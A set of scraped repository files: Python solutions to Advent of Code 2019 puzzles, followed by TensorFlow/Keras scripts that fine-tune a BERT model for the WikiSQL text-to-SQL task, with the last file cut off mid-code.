input[2]=x2\n\n    for i in range(4,len(input)+1,4):\n        intcode=input[i-4:i]\n        if intcode[0]==1:\n            input[intcode[3]]=input[intcode[1]]+input[intcode[2]]\n        elif intcode[0]==2:\n            input[intcode[3]]=input[intcode[1]]*input[intcode[2]]\n\n    return input[0]\n\n\ndef part2(num):\n    f = open(\"input.txt\",\"r\")\n    input = f.readlines()[0].strip().split(\",\")\n    cont=0\n    valores=[[x,y] for x in range(100) for y in range(100)]\n    while len(valores)!=0:\n        mitad=int(len(valores)/2)\n        y=gas(valores[mitad][0],valores[mitad][1],input.copy())\n        if y == num:\n            return valores[mitad]\n            break\n        elif y > num:\n            valores=valores[0:mitad]\n        elif y < num:\n            valores=valores[mitad:len(valores)]\n    return False\n\nprint(part2(19690720))\n" }, { "alpha_fraction": 0.6467065811157227, "alphanum_fraction": 0.6646706461906433, "avg_line_length": 15.699999809265137, "blob_id": "692ac76971d12eb3f40a551dc371e7f84c5b90bf", "content_id": "47fffe34094fa1a5798a988e5fbaf468f3caa17b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 26, "num_lines": 10, "path": "/day1/part1.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "from math import floor\ndef fuel(x):\n\treturn floor(x/3)-2\n\nf= open(\"input.txt\",\"r\")\ninput = f.readlines()\ncont=0\nfor i in input:\n    cont=cont+fuel(int(i))\nprint(cont)\n" }, { "alpha_fraction": 0.557692289352417, "alphanum_fraction": 0.5705128312110901, "avg_line_length": 16.22222137451172, "blob_id": "422f0d6e75f08aafa68fc19570182490dba9114e", "content_id": "399aed6e3dc6324e522c3b6210148b8f0d34c65e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 24, "num_lines": 18, "path": "/day1/part2.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "from math import floor\nimport numpy as np\ndef fuel(x):\n\treturn floor(x/3)-2\n\nf= open(\"input.txt\",\"r\")\ninput = f.readlines()\narr=[]\nfor i in input:\n    cont=0\n    aux=int(i)\n    while True:\n        aux=fuel(aux)\n        if aux<=0:\n            break\n        cont=cont+aux\n    arr.append(cont)\nprint(np.sum(arr))\n\n\n" }, { "alpha_fraction": 0.5587583184242249, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 25.05555534362793, "blob_id": "0d896f6c45a55ab16828c32a26b090afa93da951", "content_id": "901fa736c09ac0d839c49a2361d2f8b4af4f17dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 451, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/day2/part1.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "f = open(\"input.txt\",\"r\")\ninput = f.readlines()[0].strip().split(\",\")\ninput=[int(x) for x in input]\ncomp = input.copy()\ninput[1]=12\ninput[2]=2\n\nfor i in range(4,len(input)+1,4):\n    intcode=input[i-4:i]\n    if intcode[0]==1:\n        input[intcode[3]]=input[intcode[1]]+input[intcode[2]]\n    elif intcode[0]==2:\n        input[intcode[3]]=input[intcode[1]]*input[intcode[2]]\n\n\nfor i in range(4,len(input),4):\n    print(i,input[i-4:i])\nprint(len(input))\n" }, { "alpha_fraction": 0.5129337310791016, "alphanum_fraction": 0.5583596229553223, "avg_line_length": 19.320512771606445, "blob_id": "f43380c73e384335beffa086ea5260ff6a285d1f", "content_id": "943183eb0f3fc91b1f677890acf4882f23aac8ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1585, 
"license_type": "no_license", "max_line_length": 51, "num_lines": 78, "path": "/day3/part2.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "def parserRuta(ruta):\n newRuta=[]\n for i in ruta:\n for j in range(int(i[1:])):\n newRuta.append(i[0])\n return newRuta\n\n\ndef move(dir,actual,toString=False):\n if dir == \"R\":\n # print(\"RIGHT\")\n actual[0]=actual[0]+1\n elif dir == \"L\":\n # print(\"LEFT\")\n actual[0]=actual[0]-1\n elif dir == \"U\":\n # print(\"UP\")\n actual[1]=actual[1]+1\n elif dir == \"D\":\n # print(\"DOWN\")\n actual[1]=actual[1]-1\n if toString==True:\n return f\":{actual[0]},{actual[1]}:\"\n else:\n return actual\ndef manhatan(point):\n return abs(point[0])+abs(point[1])\nfrom time import process_time \nimport re\nt1_start = process_time() \n\nf = open(\"test2.txt\", \"r\")\n\nx,y=[i.strip().split(\",\") for i in f.readlines()]\n# print(parserRuta(x))\n# print(parserRuta(y))\n\nr1=parserRuta(x)\nr2=parserRuta(y)\n\nr1_actual=[0,0]\nr2_actual=[0,0]\n\nr1_ruta=''\nr2_ruta=[]\n# print(move(r1[0],r1_actual))\n# print(move(r1[1],r1_actual))\n# print(move(r1[2],r1_actual))\n\nfor i in r1:\n r1_ruta=r1_ruta+move(i,r1_actual,toString=True)\n # print(move(i,r1_actual))\n # print(r1_ruta)\n\nfor i in r2:\n r2_ruta.append(move(i,r2_actual).copy())\n\n# print(len(r1_ruta))\n# print(len(r2_ruta))\n\n# print(r1_ruta)\n# print(r2_ruta)\n\nres=[]\nj=0\nfor i in r2_ruta:\n print(j)\n # print(f\"{i[0]},{i[1]}\") \n if re.findall( f\":{i[0]},{i[1]}:\", r1_ruta):\n res.append(abs(i[0])+abs(i[1]))\n j=j+1\n#147050\n# print(len(r2_ruta))\nprint(sorted(res))\n\n\nt1_stop = process_time() \nprint(\"Elapsed time:\", t1_stop-t1_start)\n" } ]
6
ds-keshev/sqlova
https://github.com/ds-keshev/sqlova
c0b46a2df68c0a1fceb45497aceb55889738a104
8523af748520cfa78025c6ba28f6b3ed5df8de62
10c428217e32117e258e671642bc77bd6e8d1cdc
refs/heads/master
2020-05-04T10:07:08.348429
2019-06-04T22:32:23
2019-06-04T22:32:23
179,082,064
0
0
Apache-2.0
2019-04-02T13:19:23
2019-04-01T06:14:24
2019-03-26T07:20:19
null
[ { "alpha_fraction": 0.6256480813026428, "alphanum_fraction": 0.6386339068412781, "avg_line_length": 33.178863525390625, "blob_id": "7cd2aa361b91b065445a78f98a72db5faade40cd", "content_id": "2042aaaef94a83945f2cc956403d84d350ce6714", "detected_licenses": [ "Apache-2.0", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21023, "license_type": "permissive", "max_line_length": 153, "num_lines": 615, "path": "/wikisql_ronbert.py", "repo_name": "ds-keshev/sqlova", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Copyright 2019-present NAVER Corp.\n# Apache License v2.0\n\n# Wonseok Hwang\n# Sep30, 2018\nimport os, sys, argparse, re, json,ujson\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import *\nimport tensorflow as tf\nimport random as python_random\n# import torchvision.datasets as dsets\nimport tensorflow_hub as hub\n\nfrom sqlova.utils.utils_wikisql import *\nfrom sqlova.model.nl2sql.wikisql_models import *\nfrom sqlnet.dbengine import DBEngine\nimport bert.tokenization as tokenization\nfrom bert.modeling import BertConfig, BertModel\nfrom tensorflow.keras import backend as K\nimport random\n\n\n# In[2]:\n\n\n# In[14]:\n\n\n# Build model\ndef weighted_categorical_crossentropy(weights):\n \"\"\"\n A weighted version of keras.objectives.categorical_crossentropy\n \n Variables:\n weights: numpy array of shape (C,) where C is the number of classes\n \n Usage:\n weights = np.array([0.5,2,10]) # Class one at 0.5, class 2 twice the normal weights, class 3 10x.\n loss = weighted_categorical_crossentropy(weights)\n model.compile(loss=loss,optimizer='adam')\n \"\"\"\n \n #weights = K.variable(weights)\n \n def loss(y_true, y_pred):\n # scale predictions so that the class probas of each sample sum to 1\n y_pred /= K.sum(y_pred, axis=-1, keepdims=True)\n # clip to prevent NaN's and Inf's\n y_pred = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())\n # calc\n loss = y_true * K.log(y_pred) * weights\n loss = -K.sum(loss, -1)\n return loss\n \n return loss\n\ndef build_model_baseline(max_seq_length,max_out_len): \n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n weight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n \n bert_inputs = [in_id, in_mask, in_segment]\n all_inputs = [in_id, in_mask, in_segment, weight_input]\n bert_output = BertLayer(n_fine_tune_layers=3)(bert_inputs)\n\n denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(bert_output)\n denseSA = tf.keras.layers.Dense(256, activation='relu',name=\"denseSA\")(bert_output)\n denseWN = tf.keras.layers.Dense(256, activation='relu',name=\"denseWN\")(bert_output)\n denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(bert_output)\n denseWO = tf.keras.layers.Dense(256, activation='relu',name=\"denseWO\")(bert_output)\n \n \n sc = tf.keras.layers.Dense(13, activation='softmax',name=\"sc_output\")(denseSC)\n sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n wc = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wc_output\")(denseWC)\n wo = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wo_output\")(denseWO)\n\n loss = 
weighted_categorical_crossentropy(weight_input) \n #loss=,\n model = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n \n\n model.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n \"sa_output\":\"sparse_categorical_crossentropy\",\n \"wn_output\":\"sparse_categorical_crossentropy\",\n 'wc_output': loss, \n 'wo_output': loss}, optimizer='adam', metrics=['accuracy'])\n model.summary()\n \n return model\n \n\n\ndef initialize_vars(sess):\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n sess.run(tf.tables_initializer())\n K.set_session(sess)\n\n\nclass BertLayer(tf.layers.Layer):\n def __init__(self, n_fine_tune_layers=10, **kwargs):\n self.n_fine_tune_layers = n_fine_tune_layers\n self.trainable = True\n self.output_size = 768\n super(BertLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.bert = hub.Module(\n bert_path,\n trainable=self.trainable,\n name=\"{}_module\".format(self.name)\n )\n trainable_vars = self.bert.variables\n \n # Remove unused layers\n trainable_vars = [var for var in trainable_vars if not \"/cls/\" in var.name]\n \n # Select how many layers to fine tune\n trainable_vars = trainable_vars[-self.n_fine_tune_layers :]\n \n # Add to trainable weights\n for var in trainable_vars:\n self._trainable_weights.append(var)\n \n # Add non-trainable weights\n for var in self.bert.variables:\n if var not in self._trainable_weights:\n self._non_trainable_weights.append(var)\n \n super(BertLayer, self).build(input_shape)\n\n def call(self, inputs):\n inputs = [K.cast(x, dtype=\"int32\") for x in inputs]\n input_ids, input_mask, segment_ids = inputs\n bert_inputs = dict(\n input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids\n )\n result = self.bert(inputs=bert_inputs, signature=\"tokens\", as_dict=True)\n pooled_output = result['pooled_output']\n seq_output = result['sequence_output']\n \n return pooled_output, seq_output\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], self.output_size)\n\n\n# In[6]:\n\n\nbert_module = hub.Module(\"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\", trainable=True)\n\n\n# In[9]:\n\n\ndef create_tokenizer_from_hub_module(bert_hub_module_handle):\n \"\"\"Get the vocab file and casing info from the Hub module.\"\"\"\n with tf.Graph().as_default():\n tf.print('GRAPH STARTED')\n bert_module = hub.Module(bert_hub_module_handle)\n tf.print('MODULE DOWNLOADED')\n tokenization_info = bert_module(signature=\"tokenization_info\", as_dict=True)\n tf.print('TOKENIZATION INFO LOADED')\n with tf.Session() as sess:\n tf.print('SESSION STARTED')\n vocab_file, do_lower_case = sess.run([tokenization_info[\"vocab_file\"],\n tokenization_info[\"do_lower_case\"]])\n tf.print('VARIABLES RAN')\n return FullTokenizer(\n vocab_file=vocab_file, do_lower_case=do_lower_case)\n\n\n# ## BERT FORMATTING AND OUTPUT GENERATION\n\n# In[10]:\n\n\ndef generate_inputs(tokenizer, nlu1_tok, hds1):\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n\n segment_ids.append(0)\n for token in nlu1_tok:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n header_break = [len(tokens),len(tokens) + len(hds1)]\n # for doc\n for i, hds11 in enumerate(hds1):\n sub_tok = tokenizer.tokenize(hds11)\n tokens += sub_tok\n segment_ids += [1] * len(sub_tok)\n if i < len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n elif i == len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n 
else:\n raise EnvironmentError\n\n\n return tokens, segment_ids, header_break\n\ndef _formatForBert(tokenizer, query_token, header_token, max_seq_length):\n #####For each example, tokenize with BERT tokenizer\n #Mark each example begining, and separate each header \n #so BERT understands the query is a meaningful sequence of words but the headers are not\n #concatenate the tokens with breaks but preserve where the headers stop and start\n #then pad each example to the max sequence length within each batch\n double_tokenized_tokens = []\n for (i, token) in enumerate(query_token):\n #t_to_tt_idx1.append(\n # len(double_tokenized_tokens)) # all_doc_tokens[ indicate the start position of original 'white-space' tokens.\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n # tt_to_t_idx1.append(i)\n double_tokenized_tokens.append(sub_token) # all_doc_tokens are further tokenized using WordPiece tokenizer\n\n tokens1, segment_ids1, header_break = generate_inputs(tokenizer, double_tokenized_tokens, header_token)\n input_ids1 = tokenizer.convert_tokens_to_ids(tokens1)\n\n # Input masks\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask1 = [1] * len(input_ids1)\n\n # 3. Zero-pad up to the sequence length.\n while len(input_ids1) < max_seq_length:\n input_ids1.append(0)\n input_mask1.append(0)\n segment_ids1.append(0)\n\n assert len(input_ids1) == max_seq_length\n assert len(input_mask1) == max_seq_length\n assert len(segment_ids1) == max_seq_length\n return input_ids1,tokens1,segment_ids1,input_mask1,header_break\n\ndef formatForBert(train_data,BERT_PT_PATH= \"/DataDrive/master-wikisql/annotated_data/\",bert_type=\"uncased_L-12_H-768_A-12\",max_seq_length=222):\n \n input_ids = []\n tokens = []\n segment_ids = []\n input_masks = []\n header_breaks = []\n\n bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')\n vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')\n\n bert_config = BertConfig.from_json_file(bert_config_file)\n tokenizer = tokenization.FullTokenizer(\n vocab_file=vocab_file, do_lower_case=True)\n \n for train_example in train_data:\n query_token = train_example[\"query\"]\n header_token = train_example[\"header\"]\n input_ids1, tokens1, segment_ids1, input_mask1, header_break = _formatForBert(tokenizer, query_token,header_token,max_seq_length)\n input_ids.append(input_ids1)\n tokens.append(tokens1)\n segment_ids.append(segment_ids1)\n input_masks.append(input_mask1)\n header_breaks.append(header_break)\n\n #TODO return header breaks and use it too\n #bert_inputs = []\n return np.array(input_ids), np.array(input_masks), np.array(segment_ids)\n\ndef getBertOutput(bert_inputs, max_seq_length):\n all_input_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_ids\")\n all_input_mask = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_masks\")\n all_segment_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"segment_ids\")\n bert_output = BertLayer(n_fine_tune_layers=10)(bert_inputs)\n\n\n# ## READING INPUT, PARSING INTO WHAT WILL BE FED TO THE MODEL\n\n# In[11]:\n\n\ndef makeTrainingData(wikisql_path = \"/DataDrive/master-wikisql/annotated_data/\",sample_size=32,use_reduced_set=False):\n train_data, train_table, dev_data, dev_table, _, _ = load_wikisql(wikisql_path,\n use_reduced_set, sample_size, no_w2i=True, no_hs_tok=True)\n \n return parseToTextLines(train_data,train_table)\n\ndef parseToTextLines(train_data,train_table):\n 
train_dataframe = pd.DataFrame(train_data)\n question_toks = [[x.lower() for x in sublist] for sublist in train_dataframe[\"question_tok\"].tolist()]\n sql = train_dataframe[\"sql\"].tolist()\n table_ids = train_dataframe[\"table_id\"].tolist()\n table_headers = [[x.lower() for x in train_table[tid][\"header\"]] for tid in table_ids]\n labels = parseSqlToLabels(sql)\n assert len(question_toks)==len(table_headers)\n \n keras_model_train_data = [{\"query\":question_toks[i],\"header\":table_headers[i]} for i in range(len(question_toks))]\n return keras_model_train_data, labels\n\n\n# In[12]:\n\n\ndef load_wikisql(path_wikisql, toy_model, toy_size, bert=False, no_w2i=False, no_hs_tok=False, aug=False):\n # Get data\n train_data, train_table = load_wikisql_data(path_wikisql, mode='train', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok, aug=aug)\n dev_data, dev_table = load_wikisql_data(path_wikisql, mode='dev', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok)\n\n\n # Get word vector\n if no_w2i:\n w2i, wemb = None, None\n else:\n w2i, wemb = load_w2i_wemb(path_wikisql, bert)\n\n\n return train_data, train_table, dev_data, dev_table, w2i, wemb\n\n\ndef load_wikisql_data(path_wikisql, mode='train', toy_model=False, toy_size=10, no_hs_tok=False, aug=False):\n \"\"\" Load training sets\n \"\"\"\n if aug:\n mode = f\"aug.{mode}\"\n print('Augmented data is loaded!')\n\n path_sql = os.path.join(path_wikisql, mode+'_tok.jsonl')\n if no_hs_tok:\n path_table = os.path.join(path_wikisql, mode + '.tables.jsonl')\n else:\n path_table = os.path.join(path_wikisql, mode+'_tok.tables.jsonl')\n\n data = []\n table = {}\n with open(path_sql) as f:\n for idx, line in enumerate(f):\n if toy_model and idx >= toy_size:\n break\n\n t1 = json.loads(line.strip())\n data.append(t1)\n\n with open(path_table) as f:\n for idx, line in enumerate(f):\n if toy_model and idx > toy_size:\n break\n\n t1 = json.loads(line.strip())\n table[t1['id']] = t1\n\n return data, table\n\n\n# ## FORMATTING SQL LABELS\n\n# In[13]:\n\n\ndef get_g(sql_i):\n \"\"\" for backward compatibility, separated with get_g\"\"\"\n g_sc = []\n g_sa = []\n g_wn = []\n g_wc = []\n g_wo = []\n g_wv = []\n for b, psql_i1 in enumerate(sql_i):\n g_sc.append( psql_i1[\"sel\"] )\n g_sa.append( psql_i1[\"agg\"])\n\n conds = psql_i1['conds']\n if not psql_i1[\"agg\"] < 0:\n g_wn.append( len( conds ) )\n g_wc.append( get_wc1(conds) )\n g_wo.append( get_wo1(conds) )\n g_wv.append( get_wv1(conds) )\n else:\n raise EnvironmentError\n return g_sc, g_sa, g_wn, g_wc, g_wo, g_wv\n\ndef padWhereConditions(clause_list):\n b = np.zeros([len(clause_list),len(max(clause_list,key = lambda x: len(x)))])\n b[:] = -1\n for i,j in enumerate(clause_list):\n b[i][0:len(j)] = j\n return(b)\n\ndef parseSqlToLabels(sql): \n #return sql\n #return [random.randint(0, 1) for x in sql]\n sc,sa,wn,wc,wo,wv = get_g(sql)\n wc,wo = padWhereConditions(wc),padWhereConditions(wo)\n return np.array(sc),np.array(sa),np.array(wn),wc,wo\n \n#############new or modified\n\n\n#define token start and stop positions\ndef tok_hdr_start_top(input_ids):\n\ttok_pos = []\n\thead_pos = []\n\tfor idx, row in enumerate(input_ids):\n\t\t#print(idx)\n\t\t#seg positions\n\t\tsegs_long = np.where(row == 102)[0]\n\t\ttok_pos.append([1, segs_long[0]]) #start position is 1, ignore [CLS] token\n\t\tsegs = [];\n\t\tfor s in range(1,len(segs_long)):\n\t\t\tstart = segs_long[s-1] + 1 # start position\n\t\t\tend = segs_long[s] # end 
position\n\t\t\tsegs.append([start,end])\n\t\t\t\n\t\thead_pos.append(segs)\n\ttok_pos = np.array(tok_pos)\n\thead_pos = np.array(head_pos)\n\treturn tok_pos, head_pos\n\ndef create_wemb_masks(tok_pos, head_pos, mask_shape):\n\ttok_mask = np.zeros(mask_shape)\n\thead_mask = np.zeros(mask_shape)\n\t\n\tfor tidx, tp in enumerate(tok_pos):\n\t\ttok_mask[tidx, tp[0]:tp[1],:] = 1\n\t\n\tfor hidx, hp in enumerate(head_pos):\n\t\tfor hp1 in hp:\n\t\t\thead_mask[hidx,hp1[0]:hp1[1],:] = 1\n\t\n\treturn tok_mask, head_mask\n\t\n\t\n\t\ndef build_model_masked(max_seq_length,max_out_len, wemb_mask_shape): \n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n weight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n \n wemb_n_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_n_mask\")\n wemb_h_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_mask\")\n \n \n bert_inputs = [in_id, in_mask, in_segment]\n all_inputs = [in_id, in_mask, in_segment, weight_input, wemb_n_mask, wemb_h_mask]\n pooled_output, seq_output = BertLayer(n_fine_tune_layers=3)(bert_inputs)\n \n \n \n wemb_n = tf.keras.layers.Multiply()([seq_output, wemb_n_mask])\n wemb_h = tf.keras.layers.Multiply()([seq_output, wemb_h_mask])\n \n wemb_n = tf.keras.layers.Flatten()(wemb_n)\n wemb_h = tf.keras.layers.Flatten()(wemb_h)\n ####mask and shit here\n \n denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(wemb_h)\n denseSA = tf.keras.layers.Dense(256, activation='relu',name=\"denseSA\")(wemb_h)\n denseWN = tf.keras.layers.Dense(256, activation='relu',name=\"denseWN\")(pooled_output)\n denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(wemb_h)\n denseWO = tf.keras.layers.Dense(256, activation='relu',name=\"denseWO\")(wemb_h)\n \n \n sc = tf.keras.layers.Dense(13, activation='softmax',name=\"sc_output\")(denseSC)\n sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n wc = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wc_output\")(denseWC)\n wo = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wo_output\")(denseWO)\n\n loss = weighted_categorical_crossentropy(weight_input) \n #loss=,\n model = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n \n\n model.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n \"sa_output\":\"sparse_categorical_crossentropy\",\n \"wn_output\":\"sparse_categorical_crossentropy\",\n 'wc_output': loss, \n 'wo_output': loss}, optimizer='adam', metrics=['accuracy'])\n model.summary()\n \n return model\n \n\n\nif __name__ == \"__main__\":\n\n\tnum_CPU = 1\n\tnum_GPU = 0\n\tnum_cores = 2\n\tconfig = tf.ConfigProto(intra_op_parallelism_threads=num_cores,\n\t\t\t\t\t\tinter_op_parallelism_threads=num_cores, \n\t\t\t\t\t\tallow_soft_placement=True,\n\t\t\t\t\t\tdevice_count = {'CPU' : num_CPU,\n\t\t\t\t\t\t\t\t\t\t'GPU' : num_GPU}\n\t\t\t\t\t )\n \n\tsess = tf.Session(config = config)\n\t\n\tos.environ['TFHUB_CACHE_DIR'] = '/DataDrive/master-wikisql/tfhub_cache/'\n\n\n\t# In[3]:\n\n\n\tbert_path = \"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\"\n\n\n\t# In[4]:\n\n\n\t#qsess = tf.Session()\n\ttraining_data, train_labels = 
makeTrainingData(use_reduced_set=True,sample_size=2000)\n\tsc,sa,wn,wc,wo = train_labels\n\tw = np.ones_like(wc.copy())\n\t#w[np.where(w>=0)] = 1\n\tw[np.where(wc==-1)] = 0\n\tmax_out_len = wc.shape[1]\n\tsplit = int(0.8*len(wc))\n\ttest_data = training_data[split:]\n\ttraining_data = training_data[:split]\n\n\ttest_labels_sc = sc[split:]\n\ttrain_labels_sc = sc[:split]\n\n\ttest_labels_sa = sa[split:]\n\ttrain_labels_sa = sa[:split]\n\n\n\ttest_labels_wn = wn[split:]\n\ttrain_labels_wn = wn[:split]\n\n\ttest_labels_wc = wc[split:]\n\ttrain_labels_wc = wc[:split]\n\n\ttest_labels_wo = wo[split:]\n\ttrain_labels_wo = wo[:split]\n\n\ttrain_weights = w[:split]\n\ttest_weights = w[split:]\n\t#test_labels = np.array(test_labels).reshape(-1, 1)\n\t#train_labels= np.array(train_labels).reshape(-1, 1)\n\n\ttrain_input_ids,train_input_masks,train_segment_ids = formatForBert(training_data)\n\ttest_input_ids,test_input_masks,test_segment_ids = formatForBert(test_data)\n\t# In[19]:\n\t#training_data,train_labels = makeTrainingData(use_reduced_set=True,sample_size=2000)\n\t# In[16]:\n\t# Build the rest of the classifier \n\t\n\t\n\t\n\tmax_seq_length = 222\n\tbert_out_size = 768\n\t\n\t#header start stopcreate masks for train and test\n\ttrain_mask_shape = (len(train_input_ids), max_seq_length, bert_out_size)\n\ttrain_tok_pos, train_head_pos = tok_hdr_start_top(train_input_ids)\n\ttrain_tok_mask, train_head_mask = create_wemb_masks(train_tok_pos, train_head_pos, train_mask_shape)\n\t\n\t\n\ttest_mask_shape = (len(test_input_ids), max_seq_length, bert_out_size)\n\ttest_tok_pos, test_head_pos = tok_hdr_start_top(test_input_ids)\n\ttest_tok_mask, test_head_mask = create_wemb_masks(test_tok_pos, test_head_pos, test_mask_shape)\n\t\n\t\n\tmodel = build_model_masked(max_seq_length=max_seq_length, max_out_len=max_out_len, wemb_mask_shape = tuple(test_mask_shape[1:]))\n\n\t# Instantiate variables\n\tinitialize_vars(sess)\n\n\tmodel.fit(\n\t\t[train_input_ids, train_input_masks, train_segment_ids, train_weights, train_tok_mask, train_head_mask], \n\t\t\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t\t\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\t\tvalidation_data=([test_input_ids,test_input_masks,test_segment_ids, test_weights, test_tok_mask, test_head_mask],\n\t\t\t\t\t\t {\"sc_output\":test_labels_sc,\"sa_output\":test_labels_sa,\n\t\t\t\t\t\t \"wn_output\":test_labels_wn,\"wc_output\":test_labels_wc,\n\t\t\t\t\t\t \"wo_output\":test_labels_wo}),\n\t\tepochs=1,\n\t\tbatch_size=32\n\t)\n\n\n\t# In[18]:\n\n\n\ti = 1\n\ttest_example = test_data[i]\n\tinput1,input2,input3,input4 = test_input_ids,test_input_masks,test_segment_ids[i], test_weights[i]\n\n\n\t# In[19]:\n\n\n\tmodel.predict([input1,input2,input3,input4])\n\n\n\t# In[89]:\n\n\n\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\ttrain_labels_wo.max()\n\n\n\n" }, { "alpha_fraction": 0.6410866379737854, "alphanum_fraction": 0.655612587928772, "avg_line_length": 33.31071090698242, "blob_id": "80eda617093ec2f2926b5daceec907d0d2bf8be0", "content_id": "ade901f5f6136f106aab9b4ac14527186a15cd79", "detected_licenses": [ "Apache-2.0", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32356, "license_type": "permissive", "max_line_length": 184, "num_lines": 943, "path": "/wikisql_ronbert_v2.py", "repo_name": "ds-keshev/sqlova", 
"src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Copyright 2019-present NAVER Corp.\n# Apache License v2.0\n\n# Wonseok Hwang\n# Sep30, 2018\nimport os, sys, argparse, re, json,ujson\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import *\nimport tensorflow as tf\nimport random as python_random\n# import torchvision.datasets as dsets\nimport tensorflow_hub as hub\n\nfrom sqlova.utils.utils_wikisql import *\nfrom sqlova.model.nl2sql.wikisql_models import *\nfrom sqlnet.dbengine import DBEngine\nimport bert.tokenization as tokenization\nfrom bert.modeling import BertConfig, BertModel\nfrom tensorflow.keras import backend as K\nimport random\n\n\n# In[3]:\n\n\n\n# In[20]:\n\n\n# Build model\ndef weighted_categorical_crossentropy(weights):\n \"\"\"\n A weighted version of keras.objectives.categorical_crossentropy\n \n Variables:\n weights: numpy array of shape (C,) where C is the number of classes\n \n Usage:\n weights = np.array([0.5,2,10]) # Class one at 0.5, class 2 twice the normal weights, class 3 10x.\n loss = weighted_categorical_crossentropy(weights)\n model.compile(loss=loss,optimizer='adam')\n \"\"\"\n \n #weights = K.variable(weights)\n \n def loss(y_true, y_pred):\n # scale predictions so that the class probas of each sample sum to 1\n y_pred /= K.sum(y_pred, axis=-1, keepdims=True)\n # clip to prevent NaN's and Inf's\n y_pred = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())\n # calc\n loss = y_true * K.log(y_pred) * weights\n loss = -K.sum(loss, -1)\n return loss\n \n return loss\n\ndef build_model(max_seq_length,max_out_len,max_header_length=13): \n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n #weight_input = tf.keras.layers.Input(shape=(max_out_len,), 